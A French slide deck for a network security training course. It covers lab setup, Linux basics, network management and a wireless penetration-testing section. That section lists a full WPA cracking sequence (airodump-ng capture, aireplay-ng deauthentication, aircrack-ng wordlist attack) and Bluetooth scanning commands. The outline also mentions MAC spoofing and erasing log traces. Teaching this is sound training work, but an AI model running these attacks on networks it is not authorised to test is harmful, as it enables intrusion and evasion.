Vous êtes sur la page 1sur 12

RSSI

La sécurité dans
les réseaux :

Méthodologie et outils
d’entraînement cyber
Plan
Préparation et prise en main du Lab

Etude et analyse des protocoles et vulnérabilités


natives du réseau

Indicateurs et facteurs de compromission d’un


piratage informatique : principes et concepts
fondamentaux

Gestion des réseaux (rechercher des réseaux,


trouver des informations sur les connexions,
masquer votre réseau et vos informations DNS)

Solutions de protection réseaux (rester sécurisé et


anonyme)

Test de pénétration des réseaux sans fils


(commandes de base des réseaux, craque de
points d'accès Wifi, détection et connexion aux
signaux Bluetooth)
Préparation et prise en main
Installer Vmware worstation pro, Virtualbox
et Gns3

Créer des machines clientes et un serveur sur


lequel DHCP et DNS sont mis en place

Ajouter une machine cliente (kali) pour


vérifier et tester les vulnérabilités réseaux
Etude et analyse des protocoles et
vulnérabilités natives du réseau

Protocoles réseaux
ARP et IP

DHCP et DNS

Wifi et Bluetooth

Vulnérabilités réseaux
Scanning

Sniffing

Spoofing

D/DoS

MiTM
Indicateurs et facteurs de
compromissions d’un piratage
informatique :
Principes et concepts
fondamentaux
Terminal et système de fichiers

Terminal : Interface en ligne de commande (CLI).

Binaires : terme faisant référence à des fichiers qui peuvent être


exécutés de manière similaire aux exécutables de Windows. Les
fichiers binaires résident généralement dans le répertoire
/usr/bin ou usr/sbin et comprennent des utilitaires tels que ps,
cat, ls et cd ainsi que des applications telles que Aircrackng ou
encore Snort.

Sensibilité à la casse : Contrairement à Windows, Linux est


sensible à la casse. Chacun de ces éléments représente un nom
de fichier ou de répertoire différent. Beaucoup de personnes
venant d'un environnement Windows peuvent trouver cela
frustrant. Vous obtenez le message d'erreur " file or directory not
found" alors que vous êtes sûr que le fichier ou le répertoire
existe, vérifier la casse.

Directory : C'est la même chose qu'un dossier dans Windows. Un


répertoire permet d'organiser les fichiers de manière
hiérarchique.
Home : Chaque utilisateur possède son propre répertoire /home,
et c'est généralement là que les fichiers que vous créez seront
enregistrés par défaut.

Root : Comme tous systèmes d'exploitation, Linux dispose d'un


compte administrateur ou superutilisateur, conçu pour être
utilisé par une personne de confiance. Il s'agit de reconfigurer le
système, d'ajouter des utilisateurs ou changer les mots de passe.
En fait, de nombreux outils de piratage exigent que vous utilisiez
le compte root.

Script : Série de commandes exécutées dans un environnement


d'interprétation convertissant chaque ligne en code source.
De nombreux outils de piratage sont de simples scripts. Les
scripts peuvent être exécutés avec l'interpréteur (bash, python,
perl ou ruby).

Shell : Environnement et Interpréteur (programme) permettant


d'exécuter des commandes (bash, C ou encore Z).

Kali : Kali Linux est une distribution de Linux spécialement


conçue pour les tests de pénétration. Des centaines d'outils y
sont préinstallés, ce qui permet d'économiser les temps et les
peines d’installation et de téléchargement.

Le système de fichiers Linux : La racine / du système de fichiers se


trouve au sommet de l'arbre. Les sous-répertoires les plus
importants à connaître :
/root Le répertoire personnel de l'utilisateur tout-
puissant l'utilisateur root
/etc contient généralement les fichiers de
configuration de Linux - des fichiers qui contrôlent quand et
comment les programmes démarrent
/home Le répertoire personnel de l'utilisateur
/mnt Où d'autres systèmes de fichiers sont attachés
ou montés sur le système de fichiers.
/media Où les CD et les périphériques USB sont
généralement attachés ou montés sur le système de fichiers.
/bin Où les binaires des applications (l'équivalent des
exécutables dans Microsoft Windows) résident
/lib Où se trouvent les bibliothèques (programmes
partagés similaires aux DLL de Windows).

Manipuler du texte pour trouver,


examiner et modifier des fichiers

Se situer avec pwd


Vérifier la connexion avec whoami
Naviguer dans le système de fichiers Linux
Changer de répertoire avec cd
Lister le contenu d'un répertoire avec ls
Obtenir de l'aide
Référencer la documentation avec man
Trouver des fichiers, répertoires ou applications
Recherche avec locate
Trouver des binaires avec whereis
Recherche plus puissante avec find
Filtrage avec ps et grep

Ajouter, supprimer et mettre à jour de


fichiers

Création de fichiers
Concaténation avec cat
Création de fichiers avec touch
Création d'un répertoire
Copie d'un fichier
Renommer un fichier
Suppression d'un fichier
Suppression d'un répertoire

Gestion des réseaux (rechercher des


réseaux, trouver des informations sur les
connexions, masquer le réseau et informations
DNS)

Analyse des réseaux avec ifconfig


Vérification sans fil avec iwconfig
Modification d’infos réseaux
Changer d’adresse IP
Modifier le masque et le broadcast
Usurper une adresse MAC
S’attribuer une nouvelle adresse IP
MANIPULER LE SYSTÈME DE NOMS DE DOMAINE
Examiner le DNS avec dig
Changer de serveur DNS
Mapper son adresses IP

Installation et désinstallation logicielles


(ajout et suppression de fichiers)

Utiliser apt pour manipuler les logiciels


Recherche d'un paquet
Ajout de logiciels
Suppression de logiciels
Mise à jour des paquets
Mise à niveau des paquets
Ajouter des dépôts au fichier sources.list
Utiliser un installateur graphique
Installer des logiciels avec git
Manipuler les permissions des fichiers et
des répertoires pour contrôler qui peut accéder à
quoi avec entre autres quelques escalades de
privilèges

Gérer des systèmes de fichiers


(compresser et archiver des fichiers pour garder
votre système propre, copier des périphériques de
stockage et obtenir des informations sur les
fichiers et disques connectés)

Gérer les variables d'environnement afin


d'optimiser les performances et la discrétion

Scripts bash, élément essentiel de


piratage (exple : construire un script pour scanner
des ports cibles à infiltrer plus tard)

Gérer des services, y compris le


démarrage et l'arrêt des processus et l'allocation
des ressources un meilleur contrôle

Utiliser et manipuler le système de


journalisation pour obtenir des informations sur
l'activité d'une cible et couvrir vos propres traces
 Faire le déploiement et les tests de
fonctionnalités

 Pour finir, tester le bon fonctionnement de


votre serveur !!!
Déploiement d’un
environnement
d’exercices
Test de pénétration sans fils
WIFI :

iwlist wlan0 scan


nmcli dev wifi
nmcli dev wifi connect AP-SSID password APpassword
iwconfig

airmon-ng start|stop|restart interface


airodump-ng wlan0mon

1- airodump-ng -c 10 --bssid 01:01:AA:BB:CC:22 -w


envrcrack wlan0mon
2- aireplay-ng --deauth 20 -a 01:01:AA:BB:CC:22 -c
A0:A3:E2:44:7C:E5 wlan0mon
3- aircrack-ng -w wordlist.dic -b
01:01:AA:BB:CC:22 HackerArisePSK.cap

Bluetooth :

hcitool
hcitool scan
hcitool inq
hcitool --help
sdptool browse MACaddress

Vous aimerez peut-être aussi